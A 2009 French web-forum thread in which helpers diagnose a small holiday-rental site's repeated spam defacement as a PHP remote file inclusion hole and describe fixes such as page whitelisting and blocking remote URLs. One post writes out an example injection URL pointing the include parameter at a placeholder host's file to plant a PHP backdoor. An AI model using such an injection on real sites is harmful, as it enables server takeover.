Faille de sécurité dans mon site

**s.n.a.f.u** · 28/06/2009, 12h23

Envoyé par gitedoublel

AAAAAAAAAAAAAAAAAAAAh!!!!!!!!!!
Je pète un plomb! Ca a recommencé!
mais comment font-ils?
Il y a une faille possible avec le code de snafu?

Ce code était vraiment basique, donc pas forcément à l'épreuve des balles. Il me semblait pourtant suffisant.
Il serait effectivement nécessaire d'avoir une page piratée pour que nous puissions vraiment diagnostiquer ton problème.

**s.n.a.f.u** · 28/06/2009, 12h26

Et avant de tout mettre sur le dos de l'include, penses à changer ton mot de passe FTP. S'ils l'ont, le reste ne sert à rien...

**sabotage** · 28/06/2009, 12h30

Je dirais même, changer de logiciel de FTP, analyser voir formater tous les postes qui se connectent au FTP.

**gitedoublel** · 28/06/2009, 17h50

Bonjour!

je ne me connecte au FTP que depuis un ordinateur, le mien.
J'ai appelé OVH et ils m'ont dit que c'était toujours le même poste qui s'était connecté dans les 6 derniers mois... C'est eux qui m'ont dit que ça devait venir de mon include...
Je sais pas...

**sabotage** · 28/06/2009, 17h52

Il suffit que tu consultes les logs de connexion et tu sauras si un paramètre suspect a été passé à ta page par l'url.

Pour le FTP, on peut imaginer que ton logiciel soit infecté.

**s.n.a.f.u** · 28/06/2009, 18h40

Après avoir eu l'accès ssh au site, j'ai rajouté ce code au début de la page qui inclus :

code supprimé pour plus de discrétion

ouverture des urls distantes interdite
l'inclusion ne doit pas contenir ni http, ni ftp, ni un '\' ou un '/'
l'inclusion doit se terminer par html ou htm
le fichier doit exister au même niveau du système de fichier.

J'ai également positionné les globales à "off" : elle étaient en marche et le $contenu n'était pas récupéré par GET.

Petit plus : le log des tentatives d'injections est aussi consultable.

Ca devrait tenir un peu plus, l'idéal étant de lister les pages autorisées, mais y a un peu de boulot à faire... Ils ont bien travaillé et y a beaucoup de pages.

Et si ça ne tient pas, gageons que le hacker n'y arrivera pas du mpremier coup et que ses tentatives seront logguées, donc analysables.

**gitedoublel** · 29/06/2009, 18h17

Putain!

c'est de la tuerie! Alors la, de ce que j'en comprend, ça parait sur sécurisé! Si on ne peut plus appeler de pages extérieures, plus appeler de page autres que html... ca parait carré!

Pour répondre à sabotage et xunil, comme je l'ai dit de nombreuses fois je ne m'y conais pas bien, mais si il n'y a que mon ordinateur qui se connecte, et que toutes les pages sont statiques (html), il ne peut pas y avoir d'autre failles si?
Seulement, en effet, si j'ai un virus sur mon ordi qui commandite tout le bordel...
Ce qui me fait penser que ça vient de l'include, c'est qu'avant ça recommencait toutes les 24h en moyenne, avec le code de snafu, c'est resté normal 5-6 jours...

Sinon le piratage affiche une page noire, avec marqué gite double l en blanc(c le nom de notre site), et après ça fait comme un faux moteur de recherche genre: 'you want to know more about gite double l ? try this links!
Gite double l: free porn video
gite double l: by a house easily!
gite double l...

Voila, c'est très embêtant...

Donc snafu, maintenant je recopie ton code pour la version anglaise et l'autre site?

**s.n.a.f.u** · 29/06/2009, 18h37

Envoyé par gitedoublel

Donc snafu, maintenant je recopie ton code pour la version anglaise et l'autre site?

Pour la version anglaise, c'est fait.
Je n'avais pas pensé à l'autre site, donc je te laisse faire.

@+

**s.n.a.f.u** · 29/06/2009, 18h39

Envoyé par gitedoublel

Ce qui me fait penser que ça vient de l'include, c'est qu'avant ça recommencait toutes les 24h en moyenne, avec le code de snafu, c'est resté normal 5-6 jours...

J'aimerais bien qu'"ils" repassent un de ces jours, pour avoir le log de leurs tentatives afin d'en savoir plus.

A suivre...

**gitedoublel** · 30/06/2009, 11h35

Bon, c'est fait pour l'autre site.
Par contre, ce qui est un peu con, c'est que si on tape gitedoublel sur google, ce post arrive en deuxième position, la protection est donc plus ou moins publique...

**s.n.a.f.u** · 30/06/2009, 12h03

Envoyé par gitedoublel

Bon, c'est fait pour l'autre site.
Par contre, ce qui est un peu con, c'est que si on tape gitedoublel sur google, ce post arrive en deuxième position, la protection est donc plus ou moins publique...

Exact, j'ai modifié mon post pour ne plus afficher le code.

Bien vu

**Luc859** · 30/06/2009, 19h47

Hello,
Bon, pour le log de 19h40, c'est moi ... j'ai testé la réponse.

FoxLeRenard · 01/07/2009, 10h43

Bonjour les Amis,

Désolé d'arriver sur une discution résolue , pour y apporter mon grain de sel,
mais je voulais préciser quelques points que j'ais compris ici:

Au départ je crois il n'existe aucune faille de FTP, surtout sur un bon serveur, qui aurait eu le code FTP et comment

Alors le coupable ?
Bien sur le trou énorme du GET, qui est donc résolu si j'ais bien compris

Mais c 'est quoi ces fichiers PHP et d' ou vient' il ?

Tout bétement que lorsqu'un serveur éxécute un PHP situé SUR le serveur, celui-ci a tout les droits

du reste quand on voit comment PHPBB s'installe, crées des répertoires en change les protections, généres toutes les pages Mysql etc...

Alors c' est simple il me faut mettre au moins un PHP SUR le serveur de gitedoublel

Mais voyons il y était déjas ce PHP !!
mapageprincipale.php

puisque tout include dans un PHP ne fait qu'augmenter sa taille et son nombre d'instructions, mais son nom est le même et ses droit aussi bien sur

Alors je fais

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

mapageprincipale.php?contenu=http://www.xxx.com/pirate.txt

et dans pirate.txt j'écris le code de génération sur le serveur de mon PHP a moi qui m servira de porte d'entrée a tout ce que je veux !

J'allais dire de ce fait que vos derniers codes sont inutiles,

Par contre si vous tenez vraiment au GET alors appliquez la régle de s.n.a.f.u ou Sabotage mettez un simple code
genre

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

mapageprincipale.php?contenu=18

avec dans le php un array avec les noms des pages a inclure en fonction de la valeur reçue !

mon_nom_est_personne · 01/07/2009, 11h49

FoxLeRenard: As-tu deja entendu parler des attaque par le milieu ?

D'apres guideinformatique.com il s'agit d'une "Attaque menée par un hacker qui se place entre deux ordinateurs en communication et se fait passer pour l’un deux afin d'obtenir le mot de passe de l'autre. Dès lors, il peut se retourner vers le premier avec un mot de passe valide et l'attaquer réellement."

Comme en protocole ftp comme http, les mdp sont transmis sans encryption et que tu n'as pas de fingerprint, crois moi une connection ftp est un serieux troux de securite. C'est pour ca que les boites qui se soucies un peu de la securite utilisent sftp ou ssh pour connecter a leur serveur.

**s.n.a.f.u** · 01/07/2009, 12h01

L'essai d'explication du 9tailed est un bon début, je rajoute de la biblio :

http://www.developpez.net/forums/d19...lus-courantes/

http://php.developpez.com/faq/?page=securite

http://php.developpez.com/faq/?page=...ire-faille-xss

Au passage, j'ai interdit la balise script dans la sécurité du site...

FoxLeRenard · 01/07/2009, 12h05

Envoyé par mon_nom_est_personne

FoxLeRenard: As-tu deja entendu parler des attaque par le milieu ?

Oui l'Ami je connais bien, et nous avons donné il y a peut de temps (un mois ?) un shemat de ce mécanisme.
http://fr.wikipedia.org/wiki/Attaque...omme_du_milieu
http://www.lesnouvelles.net/articles...sms-contournee

Mais tu sais bien que ces techniques c'est du haut de gamme tu t'en doute, alors je n'ais même pas imaginé une seconde que pour le petit web du coin un hackeur de ce niveau mette en place un systéme si complexe

mon_nom_est_personne · 01/07/2009, 12h11

oui c'est claire, mais dans le cas d'un hebergeur mutualise, c'est un bon deal a mettre en place parce qu'avec une pierre tu fais plusieurs millier de coups.

FoxLeRenard · 01/07/2009, 12h15

Envoyé par mon_nom_est_personne

oui c'est claire, mais dans le cas d'un hebergeur mutualise, c'est un bon deal a mettre en place parce qu'avec une pierre tu fais plusieurs millier de coups.

Oui assez OK, et ça existe, mais pour faire ça il faut des hackeurs haut de gamme !
Bon OK toi tu fais ça le matin en te brossant les dents, mais bon quand même

mon_nom_est_personne · 01/07/2009, 12h27

hahahahaha, non non je suis incapable de mettre un truc comme ca en place comme tu l'as faut des hackers de haut niveau et je ne suis meme pas un dev de niveau moyen. C'est juste qu'il y a quelques temps au taff on a appris a nos depend que l'utilisation de ftp, c'est pas secure du tout loin de la meme.